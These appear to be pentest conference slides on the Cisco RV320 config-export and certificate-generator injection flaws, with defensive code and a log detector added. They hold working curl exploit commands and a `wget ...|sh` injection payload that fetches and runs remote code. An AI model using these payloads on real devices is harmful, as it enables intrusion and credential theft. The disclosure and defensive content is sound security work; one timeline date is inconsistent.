Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers...
Pentesting
Jonas Lieb
5 July 2019
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 1
$ whoami
Jonas Lieb
Penetration Tester at RedTeam Pentesting
former physics student at RWTH Aachen University (IIIA)
RedTeam Pentesting
Founded in 2004
from Aachen
10 pentesters
What is a pentest?
controlled attack
same methods as "evil" hackers
stipulated scope
Contract
Attack
Documentation
Workshop
Example: Cisco RV320 Router
Small-business router
Gigabit
VPN support
sold since 2013, support until 2023
firmware version v1.4.2.17 (Oct. 2017) (installed at customer's site)
www.cisco.com: Cisco RV320 Dual Gigabit WAN VPN Router
TCP Services on LAN (Internal) Ports

```
$ nmap -p 0- -sV -sS -T4 192.168.10.1
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-04 15:51 CEST
Nmap scan report for routera294b2.local (192.168.10.1)
Host is up (0.0025s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
53/tcp   open  domain   dnsmasq 2.40
80/tcp   open  http     nginx 1.10.1          <- WEB INTERFACE
443/tcp  open  ssl/http nginx 1.10.1          <- WEB INTERFACE
1723/tcp open  pptp     linux (Firmware: 1)
8000/tcp open  http     Apache httpd
8007/tcp open  http     Apache httpd          <- WEB INTERFACE (2)
8008/tcp open  http                           <- WEB INTERFACE (2)
8443/tcp open  ssl/http Apache httpd
MAC Address: 44:03:A7:A2:94:B2 (Cisco Systems)
Service Info: Host: local

Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 108.85 seconds
[...]
```

(The arrows reproduce the slide's callouts: the nginx ports carry the primary web interface, the Apache httpd ports a second one.)
TCP Services on WAN (Internet Facing) Ports
(only applies to v1.4.2.15, Aug. - Oct. 2017)

```
$ nmap -p 0- -sV -sS -T4 192.168.11.146
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-17 18:16 CEST
Nmap scan report for 192.168.11.146
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
1723/tcp open  pptp    linux (Firmware: 1)
8007/tcp open  http    Apache httpd          <- WEB INTERFACE (2)
8008/tcp open  http                          <- WEB INTERFACE (2)

Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 187.64 seconds
[...]
```

(The arrows reproduce the slide's callout: the second web interface is reachable from the WAN side.)
software.cisco.com: Firmware Download for Version 1.4.2.17
Firmware Analysis

```
$ binwalk RV32X_v1.4.2.17_20171030-code.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
64            0x40            ELF, 64-bit MSB MIPS32 rel2 executable, MIPS, version 1 (SYSV)
5353552       0x51B050        Linux kernel version "2.6.32.13-Cavium-Octeon (root@paul-i7-pc) (gcc version 4.3.3 (Cavium Networks Version: 2_0_0 build 99) ) #2 SMP Mon Oct 30 15:52"
5373352       0x51FDA8        gzip compressed data, maximum compression, from Unix, last modified: 2017-10-30 07:27:56
5516080       0x542B30        CRC32 polynomial table, little endian
[...]
7143488       0x6D0040        gzip compressed data, maximum compression, from Unix, last modified: 2017-10-30 07:52:30          <- ROOT-FS
[...]
29360128      0x1C00000       CramFS filesystem, big endian size 7122944 version 2 sorted_dirs CRC 0x9E0F53FE, edition 0, 5815 blocks, 1854 files          <- WEB INTERFACE
```

(The arrows reproduce the slide's callouts marking the root filesystem and the web interface filesystem.)
Application After Extraction

```
$ tree
.
├── cert-bin
│   └── certVerifyLogin.cgi -> ../cgi-bin/userLogin.cgi
├── cgi-bin
│   ├── accesspoint.html
│   ├── addcifsbookmark.html
│   ├── adddesktopbookmark.html
│   ├── addservicesbookmark.html
│   ├── anti_arp.bat
│   ├── api -> ../../var/
│   ├── browser_error.html
│   ├── cifs -> singlecifs
│   ├── cifs-upload -> singlecifs
│   ├── climiterror.html
│   ├── compareDB -> single_cgi
│   ├── config_adv.exp
│   ├── config.exp                <- URL: /cgi-bin/config.exp
│   ├── config_mirror.exp
│   ├── desktop1.html
[...]
```
Curl 😉

```
$ curl --insecure https://192.168.10.1/cgi-bin/config.exp
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40          <- PASSWORD HASH
[...]
```

066bae9070a9a95b3e03019db131cd40 = md5("cisco1964300002")

CVE-2019-1653 (Unauthenticated Configuration Export)
HTTP Requests During Login
Certificate Generator
Reverse Engineering
```c
commonName = "a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b";

// /usr/sbin/nk_confd_process, function confd_cert_generate
sprintf(command,
        "openssl req -new -nodes -subj "
        "'/C=%s/ST=%s/L=%s/O=%s/OU=%s/CN=%s/emailAddress=%s/'"
        " -keyout %s%s.key -out %s%s.csr -newkey rsa:%s",
        countryName, stateOrProvinceName, locality, organization,
        organizationalUnit, commonName, emailAddress,
        "/etc/flash/ca/private/", &caIdStr,
        "/etc/flash/ca/certs/", &caIdStr,
        keyLength);
system(command);
```

Resulting command:

```
openssl req -new -nodes -subj \
  '/C=US/ST=MyState/L=MyLocality/O=MyOrganization/OU=MyUnit/CN=a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b/[email protected]/' [...]
```

CVE-2019-1652 (Command Injection)
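As an added example (not from the slides, the RV320 firmware or RedTeam Pentesting), this is the shape the "sanitize inputs to the certificate generator" fix takes for the pattern above: every subject field is checked against a small allowlist, the -subj string is assembled with bounded snprintf, and openssl is started with execvp on an argv array instead of system(), so no byte of user input is ever parsed by a shell. The names cert_subject, subject_field_ok, digits_only, build_subject, spawn_openssl_req and subject_for_cn are hypothetical; the key ID and key length are assumed to be digit-only, and the e-mail address is a constructed placeholder.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical replacement for the confd_cert_generate pattern on the slide:
 * validate every field, then exec openssl directly, never through system(). */
struct cert_subject {
    const char *country, *state, *locality, *organization,
               *organizational_unit, *common_name, *email;
};

/* Allowlist for one subject component: letters, digits, space, '.', '-', '_', '@'.
 * This excludes everything the shell interprets (' " $ ` \ | ; & ( ) < >) and the
 * '/' and '=' that structure OpenSSL's -subj string. Length is bounded as well. */
int subject_field_ok(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 64) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == ' ' || c == '.' || c == '-' || c == '_' || c == '@')) return 0;
    }
    return 1;
}

/* Key IDs and key lengths only ever need digits. */
int digits_only(const char *s)
{
    if (*s == '\0') return 0;
    for (; *s; s++) if (!isdigit((unsigned char)*s)) return 0;
    return 1;
}

/* Assemble "/C=.../ST=.../L=.../O=.../OU=.../CN=.../emailAddress=.../" into out.
 * All fields are validated before anything is written. Returns 0 on success,
 * -1 if a field fails the allowlist or the subject would not fit in out. */
int build_subject(char *out, size_t outlen, const struct cert_subject *s)
{
    const char *keys[]   = { "C", "ST", "L", "O", "OU", "CN", "emailAddress" };
    const char *values[] = { s->country, s->state, s->locality, s->organization,
                             s->organizational_unit, s->common_name, s->email };
    const size_t nfields = sizeof keys / sizeof keys[0];
    size_t used = 0;
    for (size_t i = 0; i < nfields; i++)
        if (!subject_field_ok(values[i])) return -1;
    for (size_t i = 0; i < nfields; i++) {
        int w = snprintf(out + used, outlen - used, "/%s=%s", keys[i], values[i]);
        if (w < 0 || (size_t)w >= outlen - used) return -1;   /* would truncate */
        used += (size_t)w;
    }
    if (used + 2 > outlen) return -1;
    out[used++] = '/';
    out[used] = '\0';
    return 0;
}

/* Run openssl with fork + execvp on an argv array: no shell is involved, so no
 * byte of the subject can become a command. Paths follow the slide; ca_id and
 * key_bits are assumed digit-only. Returns openssl's exit status, or -1. */
int spawn_openssl_req(const char *subject, const char *ca_id, const char *key_bits)
{
    char keyout[128], csrout[128], newkey[32];
    if (!digits_only(ca_id) || !digits_only(key_bits)) return -1;
    snprintf(keyout, sizeof keyout, "/etc/flash/ca/private/%s.key", ca_id);
    snprintf(csrout, sizeof csrout, "/etc/flash/ca/certs/%s.csr", ca_id);
    snprintf(newkey, sizeof newkey, "rsa:%s", key_bits);
    char *const argv[] = { "openssl", "req", "-new", "-nodes", "-subj", (char *)subject,
                           "-keyout", keyout, "-out", csrout, "-newkey", newkey, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                                            /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* The slide's fixed subject fields with a caller-supplied common name (e-mail is a
 * constructed placeholder). Returns the subject in a static buffer, or NULL if rejected. */
const char *subject_for_cn(const char *common_name)
{
    static char buf[512];
    struct cert_subject s = { "US", "MyState", "MyLocality", "MyOrganization",
                              "MyUnit", common_name, "admin@example.com" };
    return build_subject(buf, sizeof buf, &s) == 0 ? buf : NULL;
}

int main(void)
{
    const char *injected = "a'$(wget -q -O- http://192.168.10.100:4444/|sh)'b";
    printf("CN=router: %s\n", subject_for_cn("router") ? "accepted" : "rejected");
    printf("injected CN: %s\n", subject_for_cn(injected) ? "accepted" : "rejected");
    return 0;
}
```

Rejecting the payload from the slide is the second line of defence; the first is that execvp never hands the subject to a shell at all, so even an allowlist gap cannot turn a field into a command.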
What now?
Reconfigure router
Sniff network traffic
Manipulate network traffic
Attack internal systems
Risk = Probability of Occurrence × Impact
probability of occurrence: high
impact: high
⇨ risk: high
Solutions
☐ Don't expose the web interface to the internet
☐ Require authorisation for the configuration export
☐ Sanitize inputs to the certificate generator
☐ Network separation
☐ Discard router
Responsible Disclosure Timeline
19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
![Page 60: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/60.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
23.01.2019 Advisory publishedrt-sa-2018-002
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
![Page 61: Pentesting · 7/5/2019 · What is a pentest? controlled attack same methods as "evil" hackers stipulated scope Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019)](https://reader033.fdocuments.us/reader033/viewer/2022042018/5e7631f947fe35383457f149/html5/thumbnails/61.jpg)
Responsible Disclosure TimelineResponsible Disclosure Timeline
https://www.redteam-pentesting.de/advisories/rt-sa-2018-002
19.09.2018 vulnerability identified
27.09.2018 customer approved disclosure
28.09.2018 Cisco notified, deadline: 90 days
21.12.2019 Cisco requests postponed disclosure
09.01.2019 Original deadline
22.01.2019 Cisco releases patch
23.01.2019 Advisory publishedrt-sa-2018-002
Jonas Lieb, RedTeam Pentesting GmbH - "Pentesting" (5. Juli 2019) 24
badpackets.net, 26.01.2019: "Over 9,000 Cisco RV320/RV325 routers are vulnerable to CVE-2019-1653"
blog.rapid7.com, 29.01.2019: "Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability (CVE-2019-1653): What You Need to Know"
Bleepingcomputer, 27.01.2019: "Hackers Targeting Cisco RV320/RV325 Routers Using New Exploits"
Github Repository "CiscoRV320Dump" of David Davidson (@0x27)
Firmware Upgrade... v1.4.2.17 v1.4.2.20
Solutions
(☑) Don't expose the web interface to the internet
☐ Require authorisation for the configuration export
☐ Sanitize inputs to the certificate generator*
☑ Block curl
# Excerpt from web server configuration file /etc/nginx.conf location / { root html; index index.html index.htm; + if ($http_user_agent ~* "curl") { + return 403; + } }
[...]
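Review bot: the added `if ($http_user_agent ~* "curl") { return 403; }` inside `location /` keys the decision on a header the client chooses, so it is not an authorisation check and leaves the unauthenticated export of /cgi-bin/config.exp reachable for any client that sends a different User-Agent string. The change that addresses the finding is the "Require authorisation for the configuration export" item: enforce the session or credential check on the export handler itself and leave the `location /` block as it was. A secondary point: matching any User-Agent containing "curl" case-insensitively denies legitimate tooling while protecting nothing, which is the kind of rule that should be called out in the change description if it is kept at all.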
Original Exploit

```
$ curl --insecure https://192.168.10.1/cgi-bin/config.exp
<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr>
<center>nginx/1.10.1</center>
</body>
</html>
```

New Exploit

```
$ curl --insecure --user-agent kurl \
    -X POST --data 'submitbkconfig=0' \
    https://192.168.10.1/cgi-bin/config.exp
####sysconfig####
[VERSION]
VERSION=73
MODEL=RV320
[...]
```
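The same mitigation and its bypass seen from the defender's side, as an added example that is not code from the talk, from RedTeam Pentesting or from Cisco: the script parses nginx access log lines in the standard "combined" format (the sample lines below are constructed, not captured from a router), mirrors the User-Agent rule from the slides' nginx excerpt, and flags configuration exports by endpoint and source address instead of by client. The LAN range 192.168.10.0/24 is assumed from the router address on the slides; the IPs, timestamps and byte counts are made up.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Optional

EXPORT_PATH = "/cgi-bin/config.exp"  # export endpoint named in the slides
LAN_NETS = [ip_network("192.168.10.0/24")]  # assumed router LAN (slides show 192.168.10.1)

# nginx "combined" log format: ip - user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample lines (not from a real router): a curl probe the User-Agent
# rule rejects, the "kurl" request it lets through, an admin export from the LAN,
# and an unrelated page view.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Feb/2019:10:14:02 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 403 169 "-" "curl/7.64.0"
203.0.113.7 - - [07/Feb/2019:10:14:09 +0100] "POST /cgi-bin/config.exp HTTP/1.1" 200 48213 "-" "kurl"
192.168.10.50 - - [07/Feb/2019:10:20:41 +0100] "POST /cgi-bin/config.exp HTTP/1.1" 200 48213 "https://192.168.10.1/default.htm" "Mozilla/5.0"
198.51.100.23 - - [07/Feb/2019:10:31:55 +0100] "GET /default.htm HTTP/1.1" 200 612 "-" "Mozilla/5.0"
"""


def user_agent_rule_blocks(ua: str) -> bool:
    """Mirror of the slide's nginx rule: if ($http_user_agent ~* "curl") { return 403; }"""
    return re.search("curl", ua, re.IGNORECASE) is not None


def parse(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> Optional[str]:
    """Verdict for one entry; None when it does not touch the export endpoint."""
    if entry["path"].split("?", 1)[0] != EXPORT_PATH:
        return None
    if not entry["status"].startswith("2"):
        return "export-denied"
    # A configuration file served to an address outside the LAN is the event to
    # alert on, regardless of which User-Agent string the client sent.
    if any(ip_address(entry["ip"]) in net for net in LAN_NETS):
        return "export-served-lan"
    return "export-served-wan"


def scan(log_text: str) -> list:
    """Return (source ip, user agent, verdict) for every request to the export endpoint."""
    findings = []
    for line in log_text.splitlines():
        entry = parse(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is not None:
            findings.append((entry["ip"], entry["ua"], verdict))
    return findings


if __name__ == "__main__":
    for ip, ua, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:18} {ip:15} ua={ua!r} ua_rule_blocks={user_agent_rule_blocks(ua)}")
```

Run against the sample, the first line is the only one the User-Agent rule stops, while the second line is a full configuration export leaving to a WAN address that the rule never saw as a problem.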
Timeline (Part 2)
https://www.redteam-pentesting.de/advisories/rt-sa-2018-003
22.01.2019 Cisco releases "patch"
07.02.2019 Incomplete mitigation identified
08.02.2019 Cisco notified, deadline: 27.03.2019
25.03.2019 Cisco requests postponed disclosure
25.03.2019 Postponement declined
27.03.2019 Advisory published (rt-sa-2019-003)
04.04.2019 Cisco releases second patch
Bleepingcomputer, 28.03.2019: "Cisco Botches Fix for RV320, RV325 Routers, Just Blocks 'curl' User Agent"
Heise Security, 28.03.2019: "Updates: Cisco secures its router and switch system IOS"
Tweet by @Tophness, 29.03.2019
Pentest = legal, controlled attack
versatile and creative process
Pentests improve security of software and hardware
https://www.redteam-pentesting.de/
[email protected]
@RedTeamPT
Appendix: Tools
Curl
Nmap (https://nmap.org/)
OWASP Zed Attack Proxy (ZAP) (https://www.zaproxy.org/)
Binwalk (https://github.com/ReFirmLabs/binwalk)
FirmwareModKit (https://github.com/rampageX/firmware-mod-kit/wiki)
Ghidra (https://ghidra-sre.org/)
Metasploit Framework (https://www.metasploit.com/)